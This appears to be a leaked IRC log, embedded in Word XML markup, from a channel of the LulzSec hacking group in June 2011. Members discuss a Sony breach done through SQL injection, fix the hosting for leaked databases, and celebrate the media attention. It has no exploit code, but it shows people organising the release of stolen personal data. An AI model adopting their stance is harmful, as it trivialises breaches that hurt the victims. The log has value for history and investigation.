        <w:t>Jun 02 18:27:04 joepie91 [02:26:51] -=- nyannyan is now known as WANT2CHAT Jun 02 18:27:04 joepie91 [02:26:53] -=- BUT_WANT_TO_TRO is now known as WANT_TO_TROLL Jun 02 18:27:06 storm don't freak out over some packets Jun 02 18:27:08 storm you're all fine Jun 02 18:27:13 sabu yes Jun 02 18:27:14 storm that guy barely had 100mbps Jun 02 18:27:19 neuron haha yeah i wasn't worried :P Jun 02 18:27:20 joepie91 lol Jun 02 18:27:30 joepie91 btw Jun 02 18:27:31 storm i logged the ddos on my server in the .nl Jun 02 18:27:32 joepie91 madjack died Jun 02 18:27:33 joepie91 :P Jun 02 18:27:46 Recursion I was a magicjack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:27:46 joepie91 so inb4 massive ping timeout/split Jun 02 18:28:10 storm whos bottle_of_rum Jun 02 18:28:18 trollpoll lol?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:28:20 storm he/she tried to evade my +mode Jun 02 18:29:20 joepie91 storm Jun 02 18:29:23 joepie91 that is not very usefuk Jun 02 18:29:27 joepie91 useful* Jun 02 18:29:35 joepie91 on a server where your host can be an unmasked ip Jun 02 18:29:36 joepie91 lol Jun 02 18:29:36 storm what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:29:38 storm ./fuckem Jun 02 18:29:39 storm ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:29:44 joepie91 you banned a-z Jun 02 18:29:45 joepie91 in hostname Jun 02 18:29:50 storm i did a bitchx command Jun 02 18:29:52 storm called fuckem Jun 02 18:29:53 joepie91 if your host can be 1.2.3.4 that's not very useful Jun 02 18:29:55 joepie91 ah Jun 02 18:29:56 joepie91 fix it then Jun 02 18:29:56 joepie91 lol Jun 02 18:29:58 storm its not for looks its for lulz Jun 02 18:30:04 storm this server is no more Jun 02 18:30:06 storm relax.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:30:13 joepie91 you didnt ban everyone though Jun 02 18:30:14 joepie91 :P Jun 02 18:30:15 storm let me do my thing plox Jun 02 18:30:21 storm I didn't ban anyone Jun 02 18:30:28 joepie91 lololololol Jun 02 18:30:29 joepie91 split Jun 02 18:30:33 storm ye./ Jun 02 18:30:35 storm ye.* Jun 02 18:30:38 storm afk Jun 02 18:31:25 * pwnsauce (pwnsauce@HA-ntp.a04.d005o9.IP) has left #pure- elite Jun 02 18:32:29 neuron Sabu: Jun 02 18:32:39 storm txt me your number sabuzi Jun 02 18:32:41 storm i lost it Jun 02 18:32:47 storm bbl @g@in Jun 02 18:38:21 neuron 0-0\ Jun 02 18:38:23 neuron that was fun Jun 02 18:41:30 trollpoll ey guys, this is not a funeral xD Jun 02 19:03:22 * Sabu has quit (Ping timeout: 121 seconds) Jun 02 19:05:42 neuron p.s i didnt make a IAMA on reddit was a misunderstanding Jun 02 19:08:29 trollpoll well, i dont think this is a problem bigger than having a twitter account, or a webpage, but is important to know what to do with it Jun 02 19:08:47 neuron aye Jun 02 19:08:51 neuron were good Jun 02 19:11:36 * Palladium has quit (Quit: Lost terminal) Jun 02 19:12:02 Recursion I always wondered why lulzsec is hosted on same server as these sites: Jun 02 19:12:02 Recursion Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 19:12:02 Recursion lulzsecurity.com Jun 02 19:12:02 Recursion sale4gucci.com Jun 02 19:12:02 Recursion www.louisvuitton4bag.com Jun 02 19:12:57 neuron lol Jun 02 19:13:57 neuron bbiab Jun 02 19:18:00 * Neuron has quit (Ping timeout: 121 seconds) Jun 02 19:18:10 * Sabu (sabu@HA-v86.0ft.1icbev.IP) has joined #pure-elite Jun 02 19:18:19 * Sabu has quit (Connection closed) Jun 02 19:19:13 * Sabu (sabu@HA-06g.14k.jdcvo3.IP) has joined #pure-elite Jun 02 19:22:39 Recursion www.sale4gucci.com Jun 02 19:22:43 * Topiary has quit (Ping timeout: 121 seconds) Jun 02 19:22:43 Recursion also that Jun 02 19:23:17 Recursion Sabu: Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; I always wondered why lulzsec is hosted on same server as these sites: Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; lulzsecurity.com Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; sale4gucci.com Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; www.louisvuitton4bag.com Jun 02 19:26:04 trollpoll this means that the host desnt ask about the web activity xDDD Jun 02 19:27:40 trollpoll night Jun 02 19:27:44 * trollpoll has quit (Quit: Leaving) Jun 02 19:30:15 sabu it hs nothing to do with us Jun 02 19:30:28 Recursion just saying brother Jun 02 19:59:55 * lol gives channel operator status to Sabu Jun 02 20:22:33 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Thu Jun 2 20:22:33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Fri Jun 3 13:15:48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13:15:48 * Now talking on #pure-elite Jun 03 13:15:48 * Topic for #pure-elite is: pE | Today we're having a meeting - stick around Jun 03 13:15:48 * Topic for #pure-elite set by Sabu!sabu@HA- 06g.14k.jdcvo3.IP at Fri Jun 3 09:41:46 2011 Jun 03 13:17:46 sabu jeaaa Jun 03 13:18:01 [redacted] chyeaaaa Jun 03 13:18:17 [redacted] so tell me about the new sony hack Jun 03 13:18:20 [redacted] and all the lulz i missed Jun 03 13:18:33 sabu we just dorpped what we had Jun 03 13:18:37 [redacted] oh Jun 03 13:18:41 sabu everyone went crazy for it Jun 03 13:18:42 sabu rofl Jun 03 13:18:44 [redacted] you mean with the coupons?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 13:18:57 [redacted] was it from that SQLi Jun 03 13:21:57 sabu yeah Jun 03 13:22:23 lol and @lulzsec now has more than 34,000 folowers xD Jun 03 13:23:07 sabu niceee Jun 03 13:25:14 joepie91 somehow Jun 03 13:25:18 joepie91 when you have to do something in a hurry Jun 03 13:25:21 joepie91 everything goes wrong Jun 03 13:25:26 joepie91 ._.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 13:27:45 sabu yeah Jun 03 13:28:07 joepie91 internet goes derp Jun 03 13:28:18 joepie91 filezilla raeps the master table or w/e it's called Jun 03 13:28:27 joepie91 notepad starts lagging my cpu for some reason Jun 03 13:28:28 joepie91 &gt;.&gt; Jun 03 13:42:06 tflow LOL Jun 03 13:42:07 tflow LOL Jun 03 13:42:07 tflow LOL Jun 03 13:42:14 tflow cloudflare = fucked up hardcore Jun 03 13:42:14 joepie91 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 13:42:16 tflow http://www.searchdiscovered.com/?dn=INSERT%20INTO%20%60subdomains%60%20%28%60subdomain_name%60%29%20VALUES&amp;pid=5POXE2HY6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13:42:22 joepie91 that's not cloudflare Jun 03 13:42:22 tflow &gt;INSERT INTO 'subdomains' ('subdomain_name') Jun 03 13:42:23 joepie91 that is byethost Jun 03 13:42:24 joepie91 lol Jun 03 13:42:25 tflow i know Jun 03 13:42:31 tflow wel Jun 03 13:42:32 tflow yeah Jun 03 13:42:33 tflow it could be Jun 03 13:42:37 joepie91 it is :P Jun 03 13:42:42 tflow but when you go to the site it redirects to that Jun 03 13:42:45 joepie91 ye Jun 03 13:42:51 joepie91 because byethost could not find the file at first Jun 03 13:42:53 joepie91 thus redirected there Jun 03 13:42:55 joepie91 as "error page" Jun 03 13:43:05 joepie91 and cloudflare cached the redirect Jun 03 13:43:14 joepie91 but if you check the IP that shit is hosted on Jun 03 13:43:21 joepie91 you'll see it's byethost, not cf :) Jun 03 13:43:29 joepie91 byethost has like 61234612346 domains Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Connecting lulzsecurity.com:80 Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Connected Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 GET /releases/x_factor_contestants_database.sql HTTP/1.0 Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Host: lulzsecurity.com Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Cookie: __cfduid=db7dd1e6b9d039ee2820200b883a7ee291307121478 Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Accept: */* Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Pragma: no-cache Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Cache-Control: no-cache Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Connection: close Jun 03 13:45:42 joepie91 2011-06-03 19:45:14 HTTP/1.1 404 Not Found Jun 03 13:45:43 joepie91 2011-06-03 19:45:14 Server: cloudflare-nginx Jun 03 13:45:44 joepie91 2011-06-03 19:45:14 Date: Fri, 03 Jun 2011 17:45:11 GMT Jun 03 13:45:45 joepie91 2011-06-03 19:45:14 Content-Type: text/html Jun 03 13:45:46 joepie91 2011-06-03 19:45:14 Connection: close Jun 03 13:45:47 joepie91 2011-06-03 19:45:14 Accept-Ranges: bytes Jun 03 13:45:48 joepie91 2011-06-03 19:45:14 Vary: User-Agent Jun 03 13:45:49 joepie91 2011-06-03 19:45:14 Cache-Control: public, proxy- revalidate Jun 03 13:45:50 joepie91 2011-06-03 19:45:14 X-Cache: MISS from demil1.byetcluster.com Jun 03 13:45:51 joepie91 2011-06-03 19:45:14 Via: 1.1 demil1.byetcluster.com:80 (Lusca/LUSCA_HEAD-r14756) Jun 03 13:45:52 joepie91 ;_; Jun 03 13:46:21 joepie91 byet gives a 404 Jun 03 13:46:34 * joepie91 calmly waits for files to propagate Jun 03 13:48:22 joepie91 Webspace:5632 MB Jun 03 13:48:23 joepie91 Disk space used0 MB Jun 03 13:48:23 joepie91 Disk Free 5632 MB Jun 03 13:48:23 joepie91 what Jun 03 13:48:33 joepie91 &gt;disk space used 0 Jun 03 13:49:17 joepie91 Bandwidth:204800 MB Jun 03 13:49:17 joepie91 Bandwidth used:481 MB Jun 03 13:49:17 joepie91 Bandwidth remaining:204319 MB Jun 03 13:49:19 joepie91 riight Jun 03 14:06:24 joepie91 mk Jun 03 14:06:28 joepie91 all sony links are working on this node Jun 03 14:06:30 joepie91 the rest is still broken Jun 03 14:08:01 tflow byethost is crewing up Jun 03 14:08:10 tflow one minute it works, next minute is redirects to portal Jun 03 14:08:33 tflow too many mood swings Jun 03 14:08:58 joepie91 tflow Jun 03 14:09:08 joepie91 as far as I know Cloudflare has a different cache for every node Jun 03 14:09:08 * virtual (virtual@HA-dfm.tk3.kjaj4b.IP) has joined #pure- elite Jun 03 14:09:23 &lt;virtual&gt; hi Jun 03 14:09:23 joepie91 that was why some people got errors when anonnews went down, while others could view an offline version Jun 03 14:09:28 &lt;virtual&gt; douh...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:09:31 * virtual is now known as trollpoll Jun 03 14:09:39 joepie91 thus, some nodes will have the redirect cached Jun 03 14:09:44 joepie91 while others have the actual files already Jun 03 14:09:48 joepie91 that is why I asked you to purge cache Jun 03 14:09:55 joepie91 so that all nodes will be forced to update their cache Jun 03 14:10:08 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 14:10:10 joepie91 .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:10:34 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 14:10:37 joepie91 wb Jun 03 14:10:43 joepie91 paste incoming Jun 03 14:10:45 joepie91 joepie91tflow Jun 03 14:10:45 joepie91 joepie91as far as I know Cloudflare has a different cache for every node Jun 03 14:10:45 joepie91 joepie91that was why some people got errors when anonnews went down, while others could view an offline version Jun 03 14:10:45 joepie91 joepie91thus, some nodes will have the redirect cached Jun 03 14:10:45 joepie91 joepie91while others have the actual files already Jun 03 14:10:45 joepie91 joepie91that is why I asked you to purge cache Jun 03 14:10:45 joepie91 joepie91so that all nodes will be forced to update their cache Jun 03 14:10:50 tflow ye, saw Jun 03 14:10:53 tflow hey trollpoll Jun 03 14:11:01 trollpoll eyyy tflow !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:11:08 joepie91 but ye, a purge cache should solve everything Jun 03 14:11:29 tflow the problem isn't @ cloudflare Jun 03 14:11:32 tflow it's @ bytehost Jun 03 14:11:35 tflow i tried with tamper data Jun 03 14:11:39 trollpoll i saw the opiran leak Jun 03 14:11:40 joepie91 it isn't...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:11:40 tflow it redirected to the portal page Jun 03 14:11:44 joepie91 you cannot force a reload Jun 03 14:11:46 tflow even with the lulzsec domain Jun 03 14:11:51 tflow trust me Jun 03 14:11:52 tflow it is Jun 03 14:11:54 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:11:55 trollpoll the emails came to us from an anonymous source? Jun 03 14:12:01 tflow if you connect directly to byethost Jun 03 14:12:07 sabu crazy trolllpoll Jun 03 14:12:10 tflow then you'll get the portal Jun 03 14:12:10 joepie91 how are you directly connecting to byethost Jun 03 14:12:16 trollpoll i hope not...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:12:19 joepie91 ohfuck Jun 03 14:12:21 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:12:22 tflow typing in the ip + modifying host header Jun 03 14:12:27 joepie91 eh Jun 03 14:12:33 joepie91 I am not sure how the byethost dns works.. Jun 03 14:12:36 joepie91 er Jun 03 14:12:37 joepie91 network* Jun 03 14:12:42 joepie91 they have server clusters Jun 03 14:12:45 joepie91 so that may be an issue Jun 03 14:12:52 tflow true Jun 03 14:12:54 joepie91 that you are sending a request to a server that is not supposed to handle the request Jun 03 14:13:02 joepie91 can you add multiple A records in cloudflare? Jun 03 14:13:13 tflow i think so Jun 03 14:13:16 tflow why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:13:22 tflow also Jun 03 14:13:34 tflow ns1.byet.org resolves lulzsec to a different i Jun 03 14:13:35 tflow ip Jun 03 14:13:40 tflow ns1-5 Jun 03 14:13:45 tflow which do not work at all Jun 03 14:13:53 tflow so i'm simply using the ip of byethost14.com Jun 03 14:14:03 tflow even though that's not the listen ip for lulzsec in their nameservers Jun 03 14:14:04 joepie91 mm Jun 03 14:14:05 joepie91 1 sec Jun 03 14:14:25 tflow listed* Jun 03 14:18:10 joepie91 tflow Jun 03 14:18:13 joepie91 point it to 209.51.196.244 Jun 03 14:18:24 joepie91 I modified my hosts file Jun 03 14:18:28 joepie91 and if I set it to that Jun 03 14:18:29 joepie91 it works Jun 03 14:18:33 tflow are you sure Jun 03 14:18:39 tflow let me try Jun 03 14:19:57 tflow doesn't work here Jun 03 14:20:24 joepie91 WTF.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:30 joepie91 byethost.com Jun 03 14:20:30 joepie91 This account is currently suspended.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:30 joepie91 It appears that this account's free hosting quota has been fully used! We would highly recommend upgrading your account here : Securesignup.net , then create a ticket at http://byet.org/premiumsupport requesting the free hosting account to be migrated to the new paid account. Jun 03 14:20:45 tflow ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:47 tflow where's that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:53 joepie91 on login Jun 03 14:20:53 joepie91 idk Jun 03 14:20:57 joepie91 k sec Jun 03 14:21:10 tflow what quota .__.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:21:24 joepie91 I have no clue Jun 03 14:21:29 joepie91 http://zymic.com/ Jun 03 14:21:33 joepie91 sign up there Jun 03 14:21:37 joepie91 it's what opmetalgear uses as well Jun 03 14:21:41 * joepie91 sighs Jun 03 14:21:55 joepie91 it's probably best to let byethost rest for now Jun 03 14:22:01 joepie91 or it'll become hours of troubleshooting Jun 03 14:24:30 tflow ugh Jun 03 14:24:33 tflow don't worry Jun 03 14:24:39 tflow i have somewhere to host it now Jun 03 14:24:43 joepie91 ah Jun 03 14:24:51 * joepie91 shoots Murphy Jun 03 14:33:43 joepie91 these people...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:33:44 joepie91 @chuckuf Jun 03 14:33:45 joepie91 Charles Farley Jun 03 14:33:45 joepie91 trying to get to lulzsecurity.com via various Tor exit nodes appear to be blocked by the host due to being a 'spam bot'. Jun 03 14:33:48 joepie91 honestly Jun 03 14:33:52 joepie91 if you are "blocked" Jun 03 14:34:00 joepie91 you pretty much get a "fill in captcha to continue" Jun 03 14:34:01 joepie91 in your face Jun 03 14:34:10 joepie91 how can you even have the misconception that you are completely blocked :| Jun 03 14:35:43 joepie91 LOL Jun 03 14:35:44 joepie91 http://twitter.com/#!/tpb Jun 03 14:35:52 joepie91 @tpb Jun 03 14:35:52 joepie91 The Pirate Bay Jun 03 14:35:52 joepie91 Sony Hacked Again, Account Data Posted to the Pirate Bay: LulzSec, aka the Lulz Boat, compromised the personal d... http://bit.ly/mn3Q3x Jun 03 14:36:02 joepie91 moaaarrrr publicity Jun 03 14:36:45 sabu oh boyy Jun 03 14:38:57 trollpoll twitter account of lulzsec has more than 35.000 followers O_O... craziness...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:39:48 trollpoll is close to pass @sony :) Jun 03 14:40:02 joepie91 @pytey Jun 03 14:40:02 joepie91 pytey Jun 03 14:40:02 joepie91 If I wasn't married I'd like to have @LulzSec as my girlfriend.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:45:24 joepie91 LOL Jun 03 14:45:25 joepie91 Sabu Jun 03 14:45:27 joepie91 @Jake_W Jun 03 14:45:27 joepie91 Jake Walker Jun 03 14:45:27 joepie91 I wonder if @Sony's ever tried Microsoft Security Essentials? It's free and probably an upgrade over their current security measures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:45:36 sabu ROFL Jun 03 14:45:43 sabu absurd hahhaha Jun 03 14:45:46 joepie91 retweet that lol Jun 03 14:45:59 sabu tell topiary Jun 03 14:46:03 joepie91 Topiary DING Jun 03 14:46:09 Topiary ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:46:13 joepie91 retweet that Jun 03 14:46:17 joepie91 http://twitter.com/#!/Jake_W/status/76718192852090880 Jun 03 14:46:19 Topiary k Jun 03 14:46:22 joepie91 :P Jun 03 14:46:48 storm hi Jun 03 14:47:37 lol omg &lt;3 this Jun 03 14:47:37 lol http://techliberation.com/wp- content/uploads/2011/06/poptartFINALTINY.gif Jun 03 14:48:26 * joepie91 save Jun 03 14:52:34 storm i just woke up again Jun 03 14:52:37 storm &gt;:x Jun 03 14:52:40 joepie91 morning xD Jun 03 14:52:45 storm thanks Jun 03 14:54:42 trollpoll lulzsec.... the reign where the sun never set... Jun 03 14:56:51 joepie91 jesus christ Jun 03 14:56:54 joepie91 all bitcoin sites are slow Jun 03 14:56:54 joepie91 atm Jun 03 15:01:45 storm -:- Channel #lulzsec was created at Fri Jun 3 02:59:10 2011 Jun 03 15:01:45 storm -:- BitchX: Join to #lulzsec was synched in 0.204 secs!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:01:45 storm -:- r0d3nt No such server Jun 03 15:01:45 storm -:- BitchX: Generating irc server map Jun 03 15:01:45 storm -:- madjack.2600.net [0] Jun 03 15:01:54 storm lmfao Jun 03 15:02:05 storm -:- Topic (#2600): 2600 | Get your faux on Jun 03 15:02:05 storm -:- Topic (#2600): set by jax!~jax@184.107.140.210 at Thu Jun 2 23:34:40 2011 Jun 03 15:02:05 storm -:- [Users(#2600:11)] Jun 03 15:02:05 storm [ hatred ] [ _kb ] [vpsypete ] [vAngryNerdA] [vschrodinge] Jun 03 15:02:05 storm [vmaxim ] [vkutio ] [vdizopsin ] [vElectRo' ] [vz0t ] Jun 03 15:02:05 storm [vbinary_ ] Jun 03 15:02:17 storm sorry guis Jun 03 15:02:21 storm did i sink your ship?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:03:12 lol lol Jun 03 15:03:24 storm hey kayla Jun 03 15:03:50 * storm hits ism electronic cigarette Jun 03 15:03:55 storm his even Jun 03 15:03:56 storm :D Jun 03 15:04:39 trollpoll @2600 The next "reporter" who calls us asking to speak to someone from @LulzSec is going to lose their phone privileges. We're serial Jun 03 15:04:42 lol hihihihihihhi \:D/ Jun 03 15:04:43 trollpoll hilarious xDDD Jun 03 15:05:11 storm troll Jun 03 15:05:16 storm i posted that last night Jun 03 15:05:18 storm it is lulz Jun 03 15:05:32 storm \o/ Jun 03 15:05:41 storm HACK US AND WE WILL BOMB YOU. - Obama Jun 03 15:05:48 trollpoll didnt see :P nice lulz ye Jun 03 15:05:54 trollpoll yes, this is not so lulz... :P Jun 03 15:06:03 storm lol Jun 03 15:06:05 trollpoll and the NATO doc too...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:06:12 storm i didnt see it Jun 03 15:06:28 trollpoll NATO document talking about anonymous Jun 03 15:06:29 * storm gives channel operator status to Topiary Jun 03 15:06:35 storm oh Jun 03 15:06:36 trollpoll that must be prosecuted Jun 03 15:06:43 storm yeah i saw that Jun 03 15:06:58 trollpoll one of these days we will have tanks on our homes...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:07:19 storm yeah no shit Jun 03 15:07:28 trollpoll http://www.nato-pa.int/default.asp?SHORTCUT=2443 Jun 03 15:07:28 storm scary stuff Jun 03 15:07:31 trollpoll this is the report...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:07:45 trollpoll that =XXXX make me tent....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
